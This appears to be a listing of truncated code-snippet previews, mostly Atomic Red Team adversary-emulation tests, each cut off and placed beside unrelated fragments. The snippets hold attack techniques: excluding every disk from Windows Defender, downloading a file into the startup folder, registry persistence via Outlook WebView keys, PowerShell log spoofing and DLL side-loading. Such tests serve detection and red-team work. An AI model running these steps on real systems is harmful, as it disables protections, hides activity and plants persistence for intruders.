| $associations = @() | |
| $registryPaths = @( | |
| "HKLM:\Software\Classes", | |
| "HKCU:\Software\Classes" | |
| ) | |
| foreach ($path in $registryPaths) { | |
| Get-ChildItem $path | ForEach-Object { | |
| if ($_.PSChildName -like ".*") { | |
| $extension = $_.PSChildName |
Ref: https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a
# PrivCheck
if (-NOT ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) {
Write-Warning "Please run this script as an Administrator!"
Exit
| # Atomic Red Team Test: Add URL to Outlook WebView Registry Keys | |
| # Description: This test adds a URL to various Outlook WebView registry keys, which could be used for persistence. | |
| # MITRE ATT&CK Technique: T1112 - Modify Registry | |
| $url = "https://example.com/malicious" | |
| $officeVersions = @("16.0", "15.0", "14.0") | |
| $folders = @("Inbox", "Calendar", "Contacts", "Deleted Items", "Drafts", "Journal", "Junk E-mail", "Notes", "Outbox", "RSS", "Sent Mail", "Tasks", "Today") | |
| foreach ($version in $officeVersions) { | |
| foreach ($folder in $folders) { |
| ; NSIS Script for Atomic Red Team Tests (AutoIt, T1218.009, and driver load) | |
| ; Source and credit https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/src/T1218.009.cs | |
| !macro T1218_009_CS_CONTENT | |
| FileWrite $0 "using System;$\r$\n\ | |
| using System.EnterpriseServices;$\r$\n\ | |
| using System.Runtime.InteropServices;$\r$\n\ | |
| $\r$\n\ | |
| namespace regsvcser$\r$\n\ | |
| {$\r$\n\ |
| - name: ScriptBlock Smuggling | |
| description: This test demonstrates the use of ScriptBlock Smuggling to spoof PowerShell logs. | |
| supported_platforms: | |
| - windows | |
| input_arguments: | |
| spoofed_command: | |
| description: The benign command to be logged. | |
| type: string | |
| default: Write-Output 'Hello' | |
| executed_command: |
| local function file_exists(path) | |
| local file = io.open(path, "r") | |
| if file then | |
| file:close() | |
| return true | |
| end | |
| return false | |
| end | |
| print([[ |
| <html> | |
| <head> | |
| <title>Atomic Red Team - DLL Side-Loading HTA</title> | |
| <HTA:APPLICATION ID="AtomicSideLoad" APPLICATIONNAME="AtomicSideLoad" BORDER="thin" BORDERSTYLE="normal" ICON="shell32.dll,4" > | |
| <script language="VBScript"> | |
| Dim shell | |
| Set shell = CreateObject("Wscript.Shell") | |
| ' Base64 encoded content of invite.zip - which is https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md#atomic-test-1---dll-side-loading-using-the-notepad-gupexe-binary">https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md#atomic-test-1---dll-side-loading-using-the-notepad-gupexe-binary | |
| Dim base64EncodedContent |
| ## Chain Reaction | |
| ## Add all logical disks to Windows Defender exclusion list | |
| Write-Output "Adding all logical disks to Windows Defender exclusion list" | |
| foreach ($disk in Get-WmiObject Win32_Logicaldisk){ | |
| Add-MpPreference -ExclusionPath ($disk.deviceid + "\") | |
| } | |
| Start-Sleep -s 3 | |
| ## Download and move a file to the startup folder |
| attack_technique: Many | |
| display_name: Slash and Grab Post-Ex | |
| atomic_tests: | |
| - name: Add all logical disks to Windows Defender exclusion list | |
| description: | | |
| This test adds all logical disks on the system to the Windows Defender exclusion list. | |
| supported_platforms: | |
| - windows | |
| executor: | |
| command: | |